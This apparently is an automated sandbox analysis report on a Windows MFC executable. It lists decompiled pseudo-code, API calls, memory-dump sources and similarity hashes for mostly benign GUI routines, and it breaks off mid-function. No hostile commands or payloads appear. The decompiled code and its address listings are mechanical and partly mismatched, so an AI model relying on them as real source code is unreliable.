0x00420598
0x0042065b
0x0042065b
0x0042059e
0x004205ad
0x004205b1
0x0042064e
0x00420656
0x00000000
0x004205b7
0x004205ba
0x004205bc
0x004205c0
0x004205c5
0x004205c7
0x004205cc
0x004205d1
0x004205d6
0x004205da
0x004205de
0x004205e6
0x004205ec
0x004205ed
0x004205f5
0x00420600
0x00420602
0x00420607
0x00420607
0x00420612
0x0042061b
0x00420623
0x00420626
0x00420626
0x0042062c
0x00420635
0x0042063b
0x00420642
0x00420647
0x00420647
0x004205b1
0x00420663
0x0042066b

APIs

_EH_prolog.MSVCRT ref: 00420562
OpenFileMappingA.KERNEL32 ref: 00420584
#800.MFC42 ref: 00420590
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000004), ref: 004205A7
#521.MFC42(?,00000001), ref: 004205C0
#567.MFC42(?,00000001), ref: 004205D1
#1651.MFC42(?,?,00000001), ref: 004205DE
GetLastActivePopup.USER32(?), ref: 004205E6
#2864.MFC42(00000000,?,?,00000001), ref: 004205ED
IsIconic.USER32 ref: 004205F8
#6215.MFC42(00000009,?,?,00000001), ref: 00420607
SetForegroundWindow.USER32(?,?,?,00000001), ref: 00420612
#2463.MFC42(?,?,00000001), ref: 0042061B
#818.MFC42(?,?,00000001), ref: 00420626
UnmapViewOfFile.KERNEL32(00000000,?,00000001), ref: 0042062C
CloseHandle.KERNEL32(?,?,00000001), ref: 00420635
#6307.MFC42(?,00000001), ref: 00420642
CloseHandle.KERNEL32(?), ref: 0042064E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseHandleView$#1651#2463#2864#521#567#6215#6307#800#818ActiveForegroundH_prologIconicLastMappingOpenPopupUnmapWindow
String ID:
API String ID: 3886814232-0
Opcode ID: f87ebf4b96e2d96be54a102e2650845be0e192c4422b7eab9782532cde148556
Instruction ID: 75aea4897b8cf0d81a3aa35148170f79d419c9aa26246351e534bf8a8c0c8969
Opcode Fuzzy Hash: f87ebf4b96e2d96be54a102e2650845be0e192c4422b7eab9782532cde148556
Instruction Fuzzy Hash: E0316E75A001299FCB14EFA0ED49AAEBB75FF45344F51006AF512A32A1CB784E04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420930, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00420930(intOrPtr __ecx) {
				int _t20;
				void* _t23;
				RGNDATA* _t25;
				struct HRGN__* _t26;
				struct HRSRC__* _t31;
				long _t32;
				struct HINSTANCE__* _t39;
				int _t41;
				void* _t42;

				L004269E6();
				 *((intOrPtr*)(_t42 - 0x10)) = __ecx;
				L00425E44();
				_t39 =  *0x00429ED0;
				if(_t39 == 0) {
					L3:
					_t20 = 0;
				} else {
					_t31 = FindResourceA(_t39,  *(_t42 + 8) & 0x0000ffff, "RGN");
					if(_t31 == 0) {
						goto L3;
					} else {
						_t23 = LoadResource(_t39, _t31);
						 *(_t42 + 8) = _t23;
						if(_t23 != 0) {
							_t32 = SizeofResource(_t39, _t31);
							_t25 = LockResource( *(_t42 + 8));
							_t41 = 1;
							if(_t25 != 0) {
								 *(_t42 - 0x14) =  *(_t42 - 0x14) & 0x00000000;
								 *((intOrPtr*)(_t42 - 0x18)) = 0x42f080;
								 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
								_t26 = ExtCreateRegion(0, _t32, _t25);
								_push(_t26);
								L004264BC();
								L00426714();
								SetWindowRgn( *( *((intOrPtr*)(_t42 - 0x10)) + 0x20), _t26, _t41);
								 *((intOrPtr*)(_t42 - 0x18)) = 0x42c514;
								 *(_t42 - 4) = _t41;
								L00425FA6();
							}
							_t20 = _t41;
						} else {
							goto L3;
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t20;
			}

0x00420935
0x0042093f
0x00420942
0x00420947
0x0042094c
0x00420974
0x00420974
0x0042094e
0x0042095f
0x00420963
0x00000000
0x00420965
0x00420967
0x0042096f
0x00420972
0x00420983
0x00420985
0x0042098f
0x00420990
0x00420992
0x00420996
0x0042099d
0x004209a5
0x004209ab
0x004209af
0x004209b7
0x004209c4
0x004209ca
0x004209d4
0x004209d7
0x004209d7
0x004209dc
0x00000000
0x00000000
0x00000000
0x00420972
0x00420963
0x004209e3
0x004209eb

APIs

_EH_prolog.MSVCRT ref: 00420935
#1168.MFC42 ref: 00420942
FindResourceA.KERNEL32(?,?,RGN), ref: 00420959
LoadResource.KERNEL32(?,00000000), ref: 00420967
SizeofResource.KERNEL32(?,00000000), ref: 0042097A
LockResource.KERNEL32(?), ref: 00420985
ExtCreateRegion.GDI32(00000000,00000000,00000000), ref: 004209A5
#1641.MFC42(00000000), ref: 004209AF
#2452.MFC42(00000000), ref: 004209B7
SetWindowRgn.USER32(?,00000000,00000001), ref: 004209C4
#2414.MFC42 ref: 004209D7

Strings

RGN, xrefs: 00420952

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$#1168#1641#2414#2452CreateFindH_prologLoadLockRegionSizeofWindow
String ID: RGN
API String ID: 440252692-3190134425
Opcode ID: 35a83d0755ef21d3c51d8e4eb92efb343e80ceb89395891cbbfb3086ef9a9782
Instruction ID: 702d150c3b744b8c74804aa3fc267ed2545f54c7fe7575d756d4e8424632d69f
Opcode Fuzzy Hash: 35a83d0755ef21d3c51d8e4eb92efb343e80ceb89395891cbbfb3086ef9a9782
Instruction Fuzzy Hash: 931175B6B00625AFD700AF90EC45BBF7BB8FF45745F50006AF501A2252D7788A84C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401370, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041C77A
_ftol.MSVCRT ref: 0041C89D
_ftol.MSVCRT ref: 0041C8BA
_ftol.MSVCRT ref: 0041C8E9
_ftol.MSVCRT ref: 0041C8FE
_ftol.MSVCRT ref: 0041C917
#2414.MFC42 ref: 0041C95F

Strings

\B, xrefs: 0041C834

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$#2414H_prolog
String ID: \B
API String ID: 1936294815-2993081821
Opcode ID: eed4cd09981fbee29af2e94b677008e9a623c00c581d9a88fdd501c40c755522
Instruction ID: 0bfe0fe7fcdac8e3d4d2dc907848cd9e4c35ebc2b713da2603c336ad65c3a3be
Opcode Fuzzy Hash: eed4cd09981fbee29af2e94b677008e9a623c00c581d9a88fdd501c40c755522
Instruction Fuzzy Hash: DC711A71A0025ADFCF04DFA9D9C80EEBBB1FF48304F52852AE865A7241C33899A5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004240C6, Relevance: 12.1, APIs: 8, Instructions: 116keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000011), ref: 004240FB
#2864.MFC42(?), ref: 00424108
#4083.MFC42(?), ref: 00424117
#4083.MFC42(?), ref: 00424130
GetParent.USER32(?), ref: 0042413C
#2864.MFC42(00000000), ref: 00424143
#4083.MFC42(0042F1E0,00000000,?), ref: 00424166
GetAsyncKeyState.USER32(00000010), ref: 00424183

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4083$#2864AsyncState$Parent
String ID:
API String ID: 631876415-0
Opcode ID: 40f23ffce28ea7c0ddd3d7808f89d9c7e855f5600964cba2a47c0e769e9cb055
Instruction ID: 9220c0998511e636928ed3d51d67fc9b759bb7194e57ab6bd20025df68414239
Opcode Fuzzy Hash: 40f23ffce28ea7c0ddd3d7808f89d9c7e855f5600964cba2a47c0e769e9cb055
Instruction Fuzzy Hash: 7531E2317006319BCB259BA2E880A7B77E5FFA4790F85412AE80597351D778AC908BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401A91, Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0041249F
malloc.MSVCRT ref: 004124B5
GetVersionExA.KERNEL32(00000000), ref: 004124D2
free.MSVCRT(00000000), ref: 00412551

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$freemalloc
String ID:
API String ID: 2621035305-0
Opcode ID: c867154382b5683055346a6f9924828614b0aa12b4f39c468e2fe29e75e835b3
Instruction ID: 38d656bc1f77444ccf605d3ab37655957a1c9c3cb2d7dbb444aa655838badec6
Opcode Fuzzy Hash: c867154382b5683055346a6f9924828614b0aa12b4f39c468e2fe29e75e835b3
Instruction Fuzzy Hash: 5921D475504A12BFFA304B28EED8BA7B396E716721F20442BF502D1250E6FD98D2410D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F987, Relevance: 1.5, APIs: 1, Instructions: 37comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0042F6F0,00000000,00000001,0042F700,?), ref: 0041F9B0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: f29a39712dce2fe13e1fc0bf4a13495b3d70cab1bb6fa767f9a4683db2c5b557
Instruction ID: bfa8165280147f819d3006080672499da22a559bb0e72308a38cc1e9df6cdd89
Opcode Fuzzy Hash: f29a39712dce2fe13e1fc0bf4a13495b3d70cab1bb6fa767f9a4683db2c5b557
Instruction Fuzzy Hash: 15F05472320711BFD3209EF59CC4B9373A9BB897147A0493FB502D6550C3B4E88AC758

Uniqueness

Uniqueness Score: -1.00%

Function 00670467, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 04ffa44d108fe375eae79f5a99de608b3f61fd1cf4be51d7ea289430ecf9e266
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: D431D57660434ACFE710DF18D480A6AB7E5FF88304F4549ADE59987316D330F9068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00672674, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d19283a4cfe83fc2abcfb0e6d69087aa5458318378aab327724b7e942d7bf3b
Instruction ID: 666974432deda0c5d7fd7cbb0c8115dc9b9b4b557e77624e585114fce73f93e7
Opcode Fuzzy Hash: 9d19283a4cfe83fc2abcfb0e6d69087aa5458318378aab327724b7e942d7bf3b
Instruction Fuzzy Hash: 98E04F323114128BC761DA55C5A0996F3B6FB9037072A886AE58DA7701C224BC019780

Uniqueness

Uniqueness Score: -1.00%

Function 00402270, Relevance: 121.0, APIs: 68, Strings: 1, Instructions: 258
windowCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402270(void* __ecx, void* __edi, void* __ebp, int _a4, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				void* _v8;
				intOrPtr _v12;
				void* _v32;
				intOrPtr _v36;
				void* _v200;
				int _v212;
				char _v220;
				char _v224;
				long _t78;
				int _t82;
				signed int _t83;
				int _t84;
				void* _t106;
				void* _t109;

				L004269E6();
				_push(__ecx);
				_push(_t83);
				_push(_a20);
				_t106 = __ecx;
				L0042600C();
				_t84 = _t83 | 0xffffffff;
				if(E00427E91 != _t84) {
					L00425E08();
					_a4 = 0;
					SendMessageA( *(__ecx + 0x20), 0x1036, 0, 0x22);
					_push(0x8053);
					L00425E02();
					_push(_t84);
					_push(0x82);
					_push(0);
					_push(_a12);
					_push(0);
					L00426006();
					_push(0x8062);
					L00425E02();
					_push(_t84);
					_push(0x64);
					_push(0);
					_push(_v12);
					_t109 = 1;
					_push(_t109);
					L00426006();
					_push(0x8054);
					L00425E02();
					_push(_t84);
					_push(0xf0);
					_push(0);
					_push(_v36);
					_push(2);
					L00426006();
					_push(_t109);
					_push(_t109);
					_push(_t109);
					_push(0x10);
					_push(0x10);
					L00426000();
					L00425E44();
					_push(0x9b);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9b, 0x9b));
					L00425E44();
					_push(0x9a);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9a, 0x9a));
					L00425E44();
					_push(0x9d);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9d, 0x9d));
					L00425E44();
					_push(0x90);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x90, 0x90));
					L00425E44();
					_push(0x91);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x91, 0x91));
					L00425E44();
					_push(0x92);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x92, 0x92));
					L00425E44();
					_push(0x93);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x93, 0x93));
					L00425E44();
					_push(0x94);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x94, 0x94));
					L00425E44();
					_push(0x95);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x95, 0x95));
					L00425E44();
					_push(0x96);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x96, 0x96));
					L00425E44();
					_push(0x97);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x97, 0x97));
					L00425E44();
					_push(0x98);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x98, 0x98));
					L00425E44();
					_push(0x99);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x99, 0x99));
					_t78 = _t106 + 0x94;
					if(_t78 != 0) {
						_t78 =  *(_t78 + 4);
					}
					_push(SendMessageA( *(_t106 + 0x20), 0x1003, 1, _t78));
					L00425FF4();
					_push("CClientPrivateComView");
					L00425FB8();
					_v212 = 1;
					_push( &_v224);
					_push(_t106);
					E00401672( &_v220);
					_v212 = _v212 & 0x00000000;
					L00425DFC();
					_v212 = _t84;
					L00425DFC();
					_t82 = 0;
				} else {
					_t82 = _t84;
				}
				 *[fs:0x0] = _v220;
				return _t82;
			}

0x0040899d
0x004089a2
0x004089a3
0x004089a5
0x004089a9
0x004089ab
0x004089b0
0x004089b5
0x004089c4
0x004089d6
0x004089da
0x004089e0
0x004089e9
0x004089ee
0x004089ef
0x004089f4
0x004089f7
0x004089fb
0x004089fc
0x00408a01
0x00408a0a
0x00408a0f
0x00408a10
0x00408a12
0x00408a15
0x00408a1b
0x00408a1c
0x00408a1d
0x00408a22
0x00408a2b
0x00408a30
0x00408a31
0x00408a36
0x00408a39
0x00408a3d
0x00408a3f
0x00408a44
0x00408a45
0x00408a46
0x00408a47
0x00408a4f
0x00408a51
0x00408a56
0x00408a60
0x00408a61
0x00408a64
0x00408a80
0x00408a82
0x00408a8c
0x00408a8d
0x00408a90
0x00408aa0
0x00408aa2
0x00408aac
0x00408aad
0x00408ab0
0x00408ac0
0x00408ac2
0x00408acc
0x00408acd
0x00408ad0
0x00408ae0
0x00408ae2
0x00408aec
0x00408aed
0x00408af0
0x00408b00
0x00408b02
0x00408b0c
0x00408b0d
0x00408b10
0x00408b20
0x00408b22
0x00408b2c
0x00408b2d
0x00408b30
0x00408b40
0x00408b42
0x00408b4c
0x00408b4d
0x00408b50
0x00408b60
0x00408b62
0x00408b6c
0x00408b6d
0x00408b70
0x00408b80
0x00408b82
0x00408b8c
0x00408b8d
0x00408b90
0x00408ba0
0x00408ba2
0x00408bac
0x00408bad
0x00408bb0
0x00408bc0
0x00408bc2
0x00408bcc
0x00408bcd
0x00408bd0
0x00408be0
0x00408be2
0x00408bec
0x00408bed
0x00408bf0
0x00408c00
0x00408c02
0x00408c0c
0x00408c0e
0x00408c0e
0x00408c22
0x00408c23
0x00408c28
0x00408c31
0x00408c3a
0x00408c3f
0x00408c40
0x00408c41
0x00408c46
0x00408c51
0x00408c5a
0x00408c5e
0x00408c63
0x004089b7
0x004089b7
0x004089b7
0x00408c6b
0x00408c73

APIs

_EH_prolog.MSVCRT ref: 0040899D
#4464.MFC42(?), ref: 004089AB
#540.MFC42(?,?,?), ref: 004089C4
SendMessageA.USER32 ref: 004089DA
#4160.MFC42(00008053,?,?,?), ref: 004089E9
#3996.MFC42(00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 004089FC
#4160.MFC42(00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A0A
#3996.MFC42(00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A1D
#4160.MFC42(00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A2B
#3996.MFC42(00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408A3F
#2096.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00408A51
#1168.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00408A56
#1146.MFC42(0000009B,0000000E,0000009B,00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?), ref: 00408A64
LoadIconA.USER32(00000000,0000009B), ref: 00408A70
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408A80
#1168.MFC42(?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053), ref: 00408A82
#1146.MFC42(0000009A,0000000E,0000009A,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00408A90
LoadIconA.USER32(00000000,0000009A), ref: 00408A96
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00408AA0
#1168.MFC42(?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408AA2
#1146.MFC42(0000009D,0000000E,0000009D,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00408AB0
LoadIconA.USER32(00000000,0000009D), ref: 00408AB6
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00408AC0
#1168.MFC42(?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?), ref: 00408AC2
#1146.MFC42(00000090,0000000E,00000090,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00408AD0
LoadIconA.USER32(00000000,00000090), ref: 00408AD6
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00408AE0

Strings

CClientPrivateComView, xrefs: 00408C28

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$#1146#1168ImageList_LoadReplace$#3996#4160$#2096#4464#540H_prologMessageSend
String ID: CClientPrivateComView
API String ID: 2633976754-357165002
Opcode ID: 2654458665075024b785df32ab24b5ab52f7fdc9e37f328d90315570f3812a19
Instruction ID: 0d80e276c68ff244314dfab922e621cbbde45c390e1637522de048af2a1b5d4b
Opcode Fuzzy Hash: 2654458665075024b785df32ab24b5ab52f7fdc9e37f328d90315570f3812a19
Instruction Fuzzy Hash: 4B717EB03047587EFA20B772ED46F6B755DEF40708F41481EB58AA65E2CDBCDD448628

Uniqueness

Uniqueness Score: -1.00%

Function 00401997, Relevance: 121.0, APIs: 68, Strings: 1, Instructions: 258
windowCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401997(void* __ecx, void* __edi, void* __ebp, int _a4, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				void* _v8;
				intOrPtr _v12;
				void* _v32;
				intOrPtr _v36;
				void* _v200;
				int _v212;
				char _v220;
				char _v224;
				long _t78;
				int _t82;
				signed int _t83;
				int _t84;
				void* _t106;
				void* _t109;

				L004269E6();
				_push(__ecx);
				_push(_t83);
				_push(_a20);
				_t106 = __ecx;
				L0042600C();
				_t84 = _t83 | 0xffffffff;
				if(E0042810D != _t84) {
					L00425E08();
					_a4 = 0;
					SendMessageA( *(__ecx + 0x20), 0x1036, 0, 0x22);
					_push(0x8053);
					L00425E02();
					_push(_t84);
					_push(0x82);
					_push(0);
					_push(_a12);
					_push(0);
					L00426006();
					_push(0x8062);
					L00425E02();
					_push(_t84);
					_push(0x64);
					_push(0);
					_push(_v12);
					_t109 = 1;
					_push(_t109);
					L00426006();
					_push(0x8054);
					L00425E02();
					_push(_t84);
					_push(0xf0);
					_push(0);
					_push(_v36);
					_push(2);
					L00426006();
					_push(_t109);
					_push(_t109);
					_push(_t109);
					_push(0x10);
					_push(0x10);
					L00426000();
					L00425E44();
					_push(0x9b);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9b, 0x9b));
					L00425E44();
					_push(0x9c);
					_push(0xe);
					L00425FFA();
